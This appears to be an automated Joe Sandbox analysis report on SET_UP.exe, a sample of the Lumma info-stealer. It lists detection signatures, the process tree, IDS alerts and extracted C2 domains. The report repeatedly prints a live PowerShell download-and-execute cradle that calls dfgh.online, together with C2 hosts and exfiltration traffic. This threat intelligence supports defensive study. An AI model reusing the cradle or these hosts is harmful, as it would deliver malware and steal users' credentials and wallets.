Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SET_UP.exe

Overview

General Information

Sample name:SET_UP.exe
Analysis ID:1585349
MD5:0f91b9310e783c23ada7d4c31c89be4b
SHA1:5fd4b60f7b500744b8fbd260df03172effde1be1
SHA256:f5413e2c9c6dead8cef37abe15a25e8aa16aca8582116079211e66400e960687
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected non-DNS traffic on DNS port
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SET_UP.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\SET_UP.exe" MD5: 0F91B9310E783C23ADA7D4C31C89BE4B)
    • powershell.exe (PID: 7616 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["wholersorie.shop", "abruptyopsn.shop", "tirepublicerj.shop", "skinfuzzerz.cyou", "framekgirus.shop", "nearycrepso.shop", "cloudewahsj.shop", "rabidcowse.shop", "noisycuttej.shop"], "Build id": "hRjzG3--ELVIRA"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x541ff:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      00000000.00000003.1988338849.000000000094D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1946741383.0000000000908000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: SET_UP.exe PID: 7268JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: SET_UP.exe PID: 7268JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 1 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: PowerShell Download and Execution Cradles
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SET_UP.exe", ParentImage: C:\Users\user\Desktop\SET_UP.exe, ParentProcessId: 7268, ParentProcessName: SET_UP.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 7616, ProcessName: powershell.exe
              Sigma detected: Suspicious PowerShell Parameter Substring
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SET_UP.exe", ParentImage: C:\Users\user\Desktop\SET_UP.exe, ParentProcessId: 7268, ParentProcessName: SET_UP.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 7616, ProcessName: powershell.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SET_UP.exe", ParentImage: C:\Users\user\Desktop\SET_UP.exe, ParentProcessId: 7268, ParentProcessName: SET_UP.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 7616, ProcessName: powershell.exe
              Sigma detected: PowerShell Web Download
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SET_UP.exe", ParentImage: C:\Users\user\Desktop\SET_UP.exe, ParentProcessId: 7268, ParentProcessName: SET_UP.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 7616, ProcessName: powershell.exe
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SET_UP.exe", ParentImage: C:\Users\user\Desktop\SET_UP.exe, ParentProcessId: 7268, ParentProcessName: SET_UP.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 7616, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SET_UP.exe", ParentImage: C:\Users\user\Desktop\SET_UP.exe, ParentProcessId: 7268, ParentProcessName: SET_UP.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 7616, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-07T14:48:24.252351+010020283713Unknown Traffic192.168.2.449750188.114.97.3443TCP
              2025-01-07T14:48:25.268050+010020283713Unknown Traffic192.168.2.449751188.114.97.3443TCP
              2025-01-07T14:48:26.366865+010020283713Unknown Traffic192.168.2.449752188.114.97.3443TCP
              2025-01-07T14:48:28.874636+010020283713Unknown Traffic192.168.2.449753188.114.97.3443TCP
              2025-01-07T14:48:30.089413+010020283713Unknown Traffic192.168.2.449754188.114.97.3443TCP
              2025-01-07T14:48:33.035251+010020283713Unknown Traffic192.168.2.449755188.114.97.3443TCP
              2025-01-07T14:48:34.030662+010020283713Unknown Traffic192.168.2.449756188.114.97.3443TCP
              2025-01-07T14:48:35.004044+010020283713Unknown Traffic192.168.2.449757188.114.97.3443TCP
              2025-01-07T14:48:36.452005+010020283713Unknown Traffic192.168.2.449758185.161.251.21443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-07T14:48:24.781192+010020546531A Network Trojan was detected192.168.2.449750188.114.97.3443TCP
              2025-01-07T14:48:25.743537+010020546531A Network Trojan was detected192.168.2.449751188.114.97.3443TCP
              2025-01-07T14:48:35.493784+010020546531A Network Trojan was detected192.168.2.449757188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-07T14:48:24.781192+010020498361A Network Trojan was detected192.168.2.449750188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-07T14:48:25.743537+010020498121A Network Trojan was detected192.168.2.449751188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-07T14:48:28.274178+010020480941Malware Command and Control Activity Detected192.168.2.449752188.114.97.3443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://klipvumisui.shop:443/int_clp_sha.txtAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/int_clp_sha.txtxeAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/_BAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/int_clp_sha.txtf1Avira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/FiAvira URL Cloud: Label: malware
              Source: https://dfgh.online/Avira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/int_clp_sha.txterAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/;Avira URL Cloud: Label: malware
              Found malware configuration
              Source: SET_UP.exe.7268.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["wholersorie.shop", "abruptyopsn.shop", "tirepublicerj.shop", "skinfuzzerz.cyou", "framekgirus.shop", "nearycrepso.shop", "cloudewahsj.shop", "rabidcowse.shop", "noisycuttej.shop"], "Build id": "hRjzG3--ELVIRA"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
              Source: SET_UP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49750 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49751 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49754 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49757 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49758 version: TLS 1.2
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2064103815.0000000007690000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb&/^s& source: powershell.exe, 00000004.00000002.2064539599.0000000007732000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbZa source: powershell.exe, 00000004.00000002.2064442184.0000000007710000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000004.00000002.2064103815.00000000076A6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbM1 source: powershell.exe, 00000004.00000002.2064539599.0000000007732000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\SET_UP.exeDirectory queried: number of queries: 1001

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49757 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49751 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49750 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49751 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49750 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49752 -> 188.114.97.3:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: wholersorie.shop
              Source: Malware configuration extractorURLs: abruptyopsn.shop
              Source: Malware configuration extractorURLs: tirepublicerj.shop
              Source: Malware configuration extractorURLs: skinfuzzerz.cyou
              Source: Malware configuration extractorURLs: framekgirus.shop
              Source: Malware configuration extractorURLs: nearycrepso.shop
              Source: Malware configuration extractorURLs: cloudewahsj.shop
              Source: Malware configuration extractorURLs: rabidcowse.shop
              Source: Malware configuration extractorURLs: noisycuttej.shop
              Source: global trafficTCP traffic: 192.168.2.4:55959 -> 162.159.36.2:53
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 185.161.251.21 185.161.251.21
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49752 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49757 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49756 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49758 -> 185.161.251.21:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49753 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49751 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49754 -> 188.114.97.3:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: skinfuzzerz.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: skinfuzzerz.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=R0WF7AGPFEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18116Host: skinfuzzerz.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=J3TIF90L1DDF8I5WYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: skinfuzzerz.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1BP8P7DHDMKP0OSWRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: skinfuzzerz.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9JWW0VJDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1212Host: skinfuzzerz.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VW51LKHI38YBQKGO44User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1104Host: skinfuzzerz.cyou
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 115Host: skinfuzzerz.cyou
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
